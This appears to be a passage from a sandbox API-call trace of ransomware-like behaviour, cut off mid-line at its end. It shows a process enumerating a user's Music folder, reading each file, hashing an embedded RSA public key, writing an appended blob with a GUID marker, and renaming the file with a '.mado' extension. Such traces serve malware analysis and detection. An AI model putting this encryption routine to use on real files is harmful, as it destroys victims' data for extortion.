[0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b808a0 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.528] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x16d7b, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x16d7b, lpOverlapped=0x0) returned 1 [0204.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.528] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.528] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.528] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.529] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.529] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.529] CloseHandle (hObject=0x63c) returned 1 [0204.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.530] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MVYeTXd9U88AMVQ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mvyetxd9u88amvq.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MVYeTXd9U88AMVQ.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mvyetxd9u88amvq.m4a.mado")) returned 1 [0204.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.531] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.532] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x590e170, ftCreationTime.dwHighDateTime=0x1d5e236, ftLastAccessTime.dwLowDateTime=0x91915300, ftLastAccessTime.dwHighDateTime=0x1d5dc12, ftLastWriteTime.dwLowDateTime=0x91915300, ftLastWriteTime.dwHighDateTime=0x1d5dc12, nFileSizeHigh=0x0, nFileSizeLow=0xe504, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nySkjpIqAgpx1qi.wav", cAlternateFileName="NYSKJP~1.WAV")) returned 1 [0204.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.532] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nySkjpIqAgpx1qi.wav") returned=".wav" [0204.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nySkjpIqAgpx1qi.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nyskjpiqagpx1qi.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.532] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=58628) returned 1 [0204.532] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.535] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe4de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.535] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.536] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.536] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xe504, lpOverlapped=0x0) returned 1 [0204.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.537] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.538] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.538] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.538] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.538] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.538] GetLastError () returned 0x0 [0204.538] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.538] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.538] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.538] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.538] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe500) returned 0x3b81690 [0204.539] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b808a0 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b808e8 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.539] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.540] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe504, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.540] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.540] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.540] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.540] CloseHandle (hObject=0x63c) returned 1 [0204.541] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nySkjpIqAgpx1qi.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nyskjpiqagpx1qi.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nySkjpIqAgpx1qi.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nyskjpiqagpx1qi.wav.mado")) returned 1 [0204.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.543] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.544] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fcac760, ftCreationTime.dwHighDateTime=0x1d5e5af, ftLastAccessTime.dwLowDateTime=0x8871bdd0, ftLastAccessTime.dwHighDateTime=0x1d5deda, ftLastWriteTime.dwLowDateTime=0x8871bdd0, ftLastWriteTime.dwHighDateTime=0x1d5deda, nFileSizeHigh=0x0, nFileSizeLow=0x10579, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O7D12rpnDK7.wav", cAlternateFileName="O7D12R~1.WAV")) returned 1 [0204.544] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\O7D12rpnDK7.wav") returned=".wav" [0204.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\O7D12rpnDK7.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\o7d12rpndk7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.559] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=66937) returned 1 [0204.559] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.561] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10553, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.561] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.563] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x10579, lpOverlapped=0x0) returned 1 [0204.563] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.564] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.564] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.564] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.565] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.565] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.565] GetLastError () returned 0x0 [0204.565] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.565] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.565] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.565] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.565] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10580) returned 0x3b81690 [0204.565] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b808e8 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80930 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe340 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6bb80 [0204.566] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 